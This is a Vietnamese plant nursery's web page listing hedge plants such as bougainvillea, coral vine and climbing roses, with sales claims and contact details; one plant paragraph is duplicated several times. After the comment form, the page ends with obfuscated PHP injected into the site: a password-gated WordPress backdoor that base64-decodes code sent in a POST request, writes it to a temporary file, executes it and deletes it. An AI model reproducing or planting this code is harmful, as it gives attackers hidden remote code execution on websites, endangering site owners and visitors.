8 cây trồng hàng rào cực đẹp và dễ chăm sóc

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Top cây trồng hàng rào cực đẹp và dễ chăm sóc – Trang trí hàng rào sẽ khiến ngôi nhà trở nên sinh động, bắt mắt hơn. Ngôi nhà có thể trở nên gần gũi với thiên thiên hơn, xanh mát hơn hay nữ tính hơn hoàn toàn phụ thuộc vào loại cây mà bạn trồng. Trong bài viết này, hãy cùng Vườn cây Hòa Bình tìm hiểu các loại cây trồng hàng rào đẹp nhất và dễ chăm sóc nhé.

Cây Xương Rồng

Cây xương rồng dễ trồng, dễ chăm sóc, có thể biến ngôi nhà của bạn mang màu sắc của một khu rừng nhiệt đới. Nếu tưới nhiều nước, xương rồng còn có thể nở hoa rất đẹp, tô điểm cho hàng rào.

Cây Xương Rồng
Cây Xương Rồng

Cây Trắc Bách Diệp

Đây là loại cây lá kim rất thích hợp để trồng ở hàng rào sân vườn hoặc ở lối đi. Với loại cây này, bạn có thể cắt tỉa để tạo ra hình dáng mà mình mong muốn. Đây là loại cây trồng hàng rào ưa nắng, cần phải được trồng ở nơi có ánh nắng chiếu vào thường xuyên.

Khả năng chịu hạn của cây tố nên ta cũng không cần phải tưới nước nhiều. Hơn nữa, cây có khả năng sinh trưởng, phát triển và nhân giống của cây rất nhanh, cây sẽ nhanh chóng phát triển, mọc xung quanh rất cả hàng rào.

>>> Xem thêm: Bán cây công trình giá rẻ – mua bán cây công trình giá rẻ Hà Nội

Cây Hoa Giấy

Hoa giấy có nhiều màu khác nhau, khi phát triển tán lá phủ rất rộng, bao phủ cả hàng rào. Cây Hoa Giấy phát triển tốt, leo tốt và có thể trồng theo hàng rào có sẵn hoặc bạn có thể tạo tán như mong muốn. Nếu bạn thích một hàng rào rực rỡ màu sắc của hoa thì Cây Hoa Giấy là một trong những gợi ý hay cho sự lựa chọn của gia đình bạn đó.

Cây Hoa Giấy
Cây Hoa Giấy

>>> Xem thêm: Bán cây công trình

Hoa Huỳnh Anh

Hoa Huỳnh Anh nở quanh năm và dễ trồng tại các vùng nhiệt đới, đặc biệt là thích hợp với khí hậu Việt Nam.

Hoa Huỳnh Anh là một loại cây mà thân cành lá đều đẹp. Trong vòng đời cây cho số lượng hoa nhiều hơn lá, hoa có hình phễu và chia ra năm cánh ở phần loe phễu có chung cuống hình chuông. Nếu trồng ở hàng rào sẽ rất đẹp và tô điểm của ngôi nhà cũng như khu vườn của gia đình bạn.

Hoa Tigon

Hoa Tigon là loài cây leo thân gỗ, cây xanh và có hoa nở quanh năm. Hoa Tigon có thể bám vào giàn hoặc leo ở độ cao từ 9 – 12m. Hoa có hình trái tim kích thước khoảng 4cm, mùa hè mùa hè ra hoa thành chùm với các sắc độ từ trắng đến hồng và đỏ san hô. Ti-gôn dễ trồng, cần nhiều ánh nắng để ra được nhiều hoa, ưa đất ẩm nhưng cũng chịu được đất khô hạn. Hoa Tigon rất thích hợp để trồng hàng rào hoặc làm giàn hoa trồng trước nhà đều đẹp.

Hoa Tigon
Hoa Tigon

Cây Hoa Hồng Leo

Hoa Hồng leo là một trong những cây trồng hàng rào được nhiều gia đình lựa chọn. Hoa Hồng leo có rất nhiều giống khác nhau từ hoa nội cho đến hoa hồng ngoại. Hoa Hồng leo cũng có nhiều màu sắc như đỏ thẫm, hồng phớt, hồng tím và trắng vàng đều rất đẹp và rực rỡ.

Đặc điểm chung của Hoa Hồng leo đó là khả năng phát triển tốt, chịu nhiệt tốt và ít sâu bệnh. Tốt nhất nên trồng Hoa Hồng leo vào đầu mùa xuân, hè, thu để cây hình thành bộ rễ khỏe mạnh trước khi mùa đông đến. Hoa Hồng leo ưa ánh sáng nên chọn những nơi có nhiều ánh sáng như vậy cây sẽ cho hoa nhiều hơn và phát triển nhanh hơn. Trồng làm hàng rào là thích hợp nhất với loại cây này. Ngôi nhà của bạn sẽ rất thơ mộng và lãng mạn với giàn hoa hồng leo trước nhà đó.

Cây Tầm Xuân

Cây Tầm Xuân là loài cây bụi, có chiều cao từ 1 – 5m và có thể leo cao tới ngọn của các loài cây khác. Đặc điểm của Cây Tầm Xuân đó là thân có nhiều gai, có móc nên leo dễ dàng. Hoa của Cây Tầm Xuân thường có màu nhạt, biến đổi từ màu hồng đậm tới màu trắng và có nhiều cánh, nhìn rất bắt mắt và đẹp.

Hoa Tigon Hoa Tigon là loài cây leo thân gỗ, cây xanh và có hoa nở quanh năm. Hoa Tigon có thể bám vào giàn hoặc leo ở độ cao từ 9 – 12m. Hoa có hình trái tim kích thước khoảng 4cm, mùa hè mùa hè ra hoa thành chùm với các sắc độ từ trắng đến hồng và đỏ san hô. Ti-gôn dễ trồng, cần nhiều ánh nắng để ra được nhiều hoa, ưa đất ẩm nhưng cũng chịu được đất khô hạn. Hoa Tigon rất thích hợp để trồng hàng rào hoặc làm giàn hoa trồng trước nhà đều đẹp.
Hoa Tigon
Hoa Tigon là loài cây leo thân gỗ, cây xanh và có hoa nở quanh năm. Hoa Tigon có thể bám vào giàn hoặc leo ở độ cao từ 9 – 12m. Hoa có hình trái tim kích thước khoảng 4cm, mùa hè mùa hè ra hoa thành chùm với các sắc độ từ trắng đến hồng và đỏ san hô. Ti-gôn dễ trồng, cần nhiều ánh nắng để ra được nhiều hoa, ưa đất ẩm nhưng cũng chịu được đất khô hạn. Hoa Tigon rất thích hợp để trồng hàng rào hoặc làm giàn hoa trồng trước nhà đều đẹp.

>>> Xem thêm: Dịch vụ mua, bán cây trồng giá rẻ tại Hà Nội

Cây Trắc Bách Diệp

Cây Trắc Bách Diệp hay còn có tên gọi khác là Cây Trắc Bá. Đặc điểm của Cây Trắc Bách Diệp đó là loài cây nhỏ, cao khoảng 2 – 3m và lá mọc đối nhau. Thân nhiều phân nhánh và xếp theo mặt thẳng đứng. Vì vậy Cây Trắc Bách Diệp rất thích hợp để trồng hàng rào xung quanh nhà của bạn.

Địa chỉ mua cây xanh công trình uy tín tại Hà Nội

Nếu có nhu cầu mua cây trồng hàng rào, quý khách hãy liên hệ với Vườn cây Hòa Bình. Là đơn vị đối tác uy tín của nhiều công trình lớn nhỏ, chúng tôi chuyên cung cấp các loại cây xanh, cây cảnh, cây phong thủy với nhiều loại cây khác nhau.

>>> Xem thêm: Thông tin chi tiết về Vườn cây Hòa Bình

Số lượng cây lớn luôn sẵn sàng và các loại cây luôn được chuẩn bị kỹ càng nhất trước khi giao đến tay quý khách hàng.

CÂY CÔNG TRÌNH GIÁ RẺ TẠI HÀ NỘI

Hotline: 0962.376.560

Địa chỉ: Tổ dân phố hoà bình 2, Biên giang , Hà Đông ,Hà Nội

Website https://vuoncayhoabinh.com/

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}